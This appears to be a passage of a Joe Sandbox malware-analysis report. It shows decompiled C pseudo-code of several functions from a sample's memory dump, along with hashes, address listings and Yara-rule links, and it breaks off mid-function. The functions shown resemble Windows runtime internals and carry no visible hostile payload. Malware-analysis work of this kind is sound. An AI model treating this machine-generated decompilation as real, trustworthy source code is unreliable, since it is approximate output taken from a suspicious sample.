0x0130ea92
0x0130ea97
0x0130ea97
0x0130ea9b
0x0130ea9c
0x0130ea9e
0x0130eaa6
0x0130eaa6
0x0130eb7e

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
Instruction ID: 09b1774f76fd2683886601f4d1fcf854797e36592ca3b8472a918a2f89c94fd2
Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
Instruction Fuzzy Hash: 4E31D4327147069BD71ADF28C890A6BB7E9FBC4214F04492DF55287781DE34E805CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 012C69A6 Relevance: .1, Instructions: 108
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E012C69A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x133d360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L01256C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E012C6BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E01289980() >= 0) {
							E01262280(_t56, 0x1338778);
							_t77 = 1;
							_t68 = 1;
							if( *0x1338774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x1338774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E0124B6F0(0x122c338, 0x122c288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E01289520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E012895D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E0125FFB0(_t68, _t77, 0x1338778);
				}
				_pop(_t78);
				return E0128B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}

0x012c69b5
0x012c69be
0x012c69c3
0x012c69c9
0x012c69cc
0x012c69d1
0x012c69d3
0x012c69de
0x012c69e1
0x012c69ea
0x012c69f6
0x012c69fe
0x012c6a13
0x012c6a14
0x012c6a15
0x012c6a16
0x012c6a1e
0x012c6a26
0x012c6a31
0x012c6a36
0x012c6a37
0x012c6a40
0x012c6a49
0x012c6a4a
0x012c6a53
0x012c6a59
0x012c6a5d
0x012c6a5e
0x012c6a64
0x012c6a67
0x012c6a6a
0x012c6a6d
0x012c6a70
0x012c6a77
0x012c6a7d
0x012c6a86
0x012c6a89
0x012c6a9c
0x012c6a9f
0x012c6aa2
0x012c6aa5
0x012c6aaf
0x012c6ab1
0x012c6ab8
0x012c6ab9
0x012c6abb
0x012c6abe
0x012c6ac5
0x012c6ac5
0x012c6aaf
0x012c6a40
0x012c6a26
0x012c69fe
0x012c6ace
0x012c6ad0
0x012c6ad3
0x012c6ad8
0x012c6adf
0x012c6adf
0x012c6ae8
0x012c6aef
0x012c6aef
0x012c6af9
0x012c6b06

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 788c542928a239eafb103a3f5128bddb801092f2a980e05c7f3f56936b6b11c6
Instruction ID: a83fb05daea914739cf62cf0d51c22e6f4a5249620c2bd68f2502fbe172b9899
Opcode Fuzzy Hash: 788c542928a239eafb103a3f5128bddb801092f2a980e05c7f3f56936b6b11c6
Instruction Fuzzy Hash: 54419BB1D11209AFDB20DFA9D840BFEBBF9EF48714F04822EEA14A7240DB319905CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01245210 Relevance: .1, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E01245210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E012452A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E012895D0();
							L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E0125EB70(_t54, 0x13379a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E012895D0();
								L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E0125EB70(_t54, 0x13379a0);
						}
						return _t52;
					}
					L5:
					_t33 = E0128F3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E0125EB70(_t54, 0x13379a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E012895D0();
							L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}

0x01245220
0x01245224
0x012a0d13
0x012a0d16
0x012a0d19
0x0124522a
0x0124522a
0x0124522d
0x0124522d
0x01245231
0x01245235
0x01245239
0x012a0d5c
0x012a0d62
0x00000000
0x00000000
0x012a0d6a
0x012a0d7b
0x012a0d7f
0x012a0d81
0x012a0d84
0x012a0d95
0x012a0d95
0x012a0d6c
0x012a0d71
0x012a0d71
0x012a0d9a
0x00000000
0x0124524a
0x0124524a
0x01245250
0x012a0d24
0x012a0d35
0x012a0d39
0x012a0d3b
0x012a0d3e
0x012a0d50
0x012a0d50
0x012a0d26
0x012a0d2b
0x012a0d2b
0x00000000
0x012a0d55
0x01245256
0x0124525b
0x01245265
0x012a0da7
0x0124526b
0x0124526e
0x01245272
0x012a0db1
0x012a0db4
0x012a0dc5
0x012a0dc5
0x01245272
0x01245278
0x0124527e
0x0124528a
0x0124528c
0x0124528d
0x00000000
0x01245280
0x01245282
0x01245288
0x0124529f
0x01245292
0x00000000
0x01245292
0x00000000
0x01245288
0x0124527e

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9d06ba8dfadc120de7e4d651271c68d2ed697741f263c400cc751e0d48aede4
Instruction ID: cf855369734865103051c1dbea324802f4e9440b5478e6365a65120c78489a9e
Opcode Fuzzy Hash: a9d06ba8dfadc120de7e4d651271c68d2ed697741f263c400cc751e0d48aede4
Instruction Fuzzy Hash: E8311632671A02EBC726AF18C881B3E7765FF50760F51462AF9560B590E770F940C6D4

Uniqueness

Uniqueness Score: -1.00%

Function 01283D43 Relevance: .1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01283D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E01257B60(0, _t61, 0x12211c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E01257B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L01264620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}

0x01283d4c
0x01283d50
0x01283d55
0x01283d5e
0x012be79a
0x00000000
0x012be79a
0x01283d68
0x012be789
0x01283d9d
0x01283da3
0x01283daf
0x01283db5
0x01283dbc
0x01283dc4
0x01283dc9
0x01283dce
0x012be7ae
0x012be7ae
0x01283dde
0x01283de2
0x01283de7
0x01283e0d
0x01283e13
0x01283e16
0x01283e1e
0x01283e25
0x01283e28
0x00000000
0x00000000
0x01283e2a
0x01283e2f
0x01283e37
0x01283e37
0x00000000
0x01283e37
0x01283e31
0x00000000
0x01283e31
0x01283e20
0x01283e20
0x01283e35
0x00000000
0x01283de9
0x01283de9
0x01283de9
0x01283dee
0x01283dfd
0x01283dff
0x01283e02
0x01283e05
0x01283e05
0x00000000
0x01283df0
0x01283de7
0x012be78f
0x012be794
0x01283d79
0x01283d84
0x01283d89
0x01283d8e
0x00000000
0x012be7a4
0x01283d96
0x01283d9a
0x00000000
0x01283d9a
0x00000000
0x012be794
0x01283d6e
0x01283d73
0x00000000
0x012be7b5
0x00000000

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d13ad07404a668b80fe992fb837cd9c42ddd5ba4d79e6d620dbfa04c1091a41
Instruction ID: ed0a54622788b50458fc0ee9459b0a7396073c79377b2e58b9cc786db6bd6d2c
Opcode Fuzzy Hash: 1d13ad07404a668b80fe992fb837cd9c42ddd5ba4d79e6d620dbfa04c1091a41
Instruction Fuzzy Hash: A231B031622616DBD729EF2DD882A7BBBE5FF55B00705806AEA45CB3D0E770D840C790

Uniqueness

Uniqueness Score: -1.00%

Function 0127A61C Relevance: .1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0127A61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x1320220);
				E0129D08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x1337b9c; // 0x0
				_t55 = L01264620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E0129D0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x1337b10 =  *0x1337b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x133536c; // 0x77995368
					if( *_t51 != 0x1335368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x1335368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x133536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E0127A70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}

0x0127a61c
0x0127a61e
0x0127a623
0x0127a628
0x0127a62b
0x0127a62d
0x0127a648
0x0127a64a
0x0127a64f
0x012b9b44
0x0127a6ec
0x0127a6f1
0x0127a6f1
0x0127a655
0x0127a657
0x0127a65a
0x0127a65d
0x0127a662
0x0127a663
0x0127a667
0x0127a668
0x0127a66d
0x0127a706
0x0127a706
0x012b9bda
0x012b9be6
0x012b9beb
0x00000000
0x012b9beb
0x0127a679
0x012b9b7a
0x00000000
0x012b9b7a
0x0127a683
0x0127a6f4
0x0127a6f7
0x0127a6f9
0x0127a6fd
0x0127a6a0
0x0127a6a0
0x0127a6ad
0x0127a6af
0x0127a6b4
0x012b9ba7
0x012b9bac
0x00000000
0x00000000
0x012b9bc6
0x012b9bce
0x012b9bd1
0x012b9bd3
0x012b9bd3
0x00000000
0x012b9bd1
0x0127a6bd
0x0127a6c3
0x0127a6c6
0x0127a6d2
0x0127a701
0x0127a704
0x00000000
0x0127a704
0x0127a6d4
0x0127a6d6
0x0127a6d9
0x0127a6db
0x0127a6e1
0x0127a6e6
0x0127a6e8
0x0127a6e8
0x0127a6ea
0x00000000
0x0127a6ea
0x0127a688
0x0127a692
0x0127a694
0x0127a699
0x00000000
0x00000000
0x0127a69d
0x00000000

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ada9dacb4acd0a02be1d569f2b10863917314825430a98e81c9f17d7a5ed32b5
Instruction ID: 70fe67c809e5d7d979e8d2ddd1922837fab7376dc30e012c028983a8a335fad1
Opcode Fuzzy Hash: ada9dacb4acd0a02be1d569f2b10863917314825430a98e81c9f17d7a5ed32b5
Instruction Fuzzy Hash: 1F416CB5A20209DFCF19CF58C490BAEBBF5FF89314F198069EA05AB344D774A941CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0126C182 Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E0126C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E01267D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E01318D34(_v8, _t80);
					}
					E01262280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E0125FFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E01318833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E0125FFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E0128B180();
						if(_a4 != 0) {
							E01262280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E0126BB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E0126BB2D(_t16, _t15);
						E0126B944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E0125FFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E0125FFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E0125FFB0(0, __ecx, _t24);
				}
				return 0;
			}

0x0126c18d
0x0126c18f
0x0126c191
0x0126c19b
0x0126c1a0
0x0126c1d4
0x0126c1de
0x012b2d6e
0x0126c1e4
0x0126c1e4
0x0126c1e4
0x0126c1ec
0x012b2d7d
0x012b2d7d
0x0126c1f3
0x0126c1ff
0x012b2d88
0x012b2d8d
0x012b2d94
0x012b2d94
0x012b2d9f
0x012b2da4
0x012b2dab
0x012b2db0
0x012b2db2
0x012b2db3
0x012b2db4
0x012b2dbc
0x012b2dc3
0x012b2dc3
0x0126c205
0x0126c205
0x0126c208
0x0126c20e
0x0126c211
0x0126c216
0x0126c219
0x0126c21f
0x0126c222
0x0126c22c
0x0126c234
0x0126c23a
0x0126c23f
0x0126c245
0x0126c24b
0x0126c251
0x0126c25a
0x0126c276
0x0126c27d
0x0126c27d
0x0126c25c
0x0126c25c
0x00000000
0x0126c25e
0x0126c1a4
0x0126c1aa
0x0126c1b3
0x0126c265
0x0126c26c
0x0126c26c
0x00000000

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction ID: 504a8d2d30113a0f6a038398363a0d534e136eb5d6626761edab0673f0646393
Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction Fuzzy Hash: C5311471A21647EBD705FBB8C490BF9FB58BF52204F04415AC95C87281DB786A99CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 012C7016 Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E012C7016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x133d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E012C6B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E012C6B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E01267D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E01289AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E0128B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L01264620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}

0x012c7016
0x012c701e
0x012c702b
0x012c7033
0x012c7037
0x012c703c
0x012c703e
0x012c7041
0x012c7045
0x012c704a
0x012c7050
0x012c7055
0x012c705a
0x012c7062
0x012c7062
0x012c705a
0x012c7064
0x012c7064
0x012c7067
0x012c7071
0x012c7096
0x012c709b
0x012c70a2
0x012c70a6
0x012c70a7
0x012c70ad
0x012c70b3
0x012c70b6
0x012c70bb
0x012c70c3
0x012c70c3
0x012c70c6
0x012c70cd
0x012c70dd
0x012c70e0
0x012c70e2
0x012c70e2
0x012c70ee
0x012c7101
0x012c70f0
0x012c70f9
0x012c70f9
0x012c710a
0x012c710e
0x012c7112
0x012c7117
0x012c7118
0x012c7118
0x012c70bb
0x012c711d
0x012c7123
0x012c7131
0x012c7131
0x012c7136
0x012c713d
0x012c713e
0x012c713f
0x012c714a
0x012c714a
0x012c7084
0x012c7088
0x00000000
0x012c708e
0x012c708e
0x012c7092
0x00000000
0x012c7092

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aaf708afac1f5d41a894f87bbc74f4c40a69b3a6b9fd070f3aa5608baf9517b4
Instruction ID: d0dfd39b090fa2b4bcac9d59ee771fd1146e2ca34be43755a8166be62b3ad615
Opcode Fuzzy Hash: aaf708afac1f5d41a894f87bbc74f4c40a69b3a6b9fd070f3aa5608baf9517b4
Instruction Fuzzy Hash: 8F31B5726147529FC320DF28C841A7AB7E9BFD8B00F044A2DFA9597790E770E904CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 01286DE6 Relevance: .1, Instructions: 101
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E01286DE6(signed int __ecx, void* __edx, signed int _a4, intOrPtr* _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t39;
				intOrPtr _t52;
				intOrPtr _t53;
				signed int _t59;
				signed int _t63;
				intOrPtr _t64;
				intOrPtr* _t66;
				void* _t68;
				intOrPtr _t69;
				signed int _t73;
				signed int _t75;
				intOrPtr _t77;
				signed int _t80;
				intOrPtr _t82;

				_t68 = __edx;
				_push(__ecx);
				_t80 = __ecx;
				_t75 = _a4;
				if(__edx >  *((intOrPtr*)(__ecx + 0x90))) {
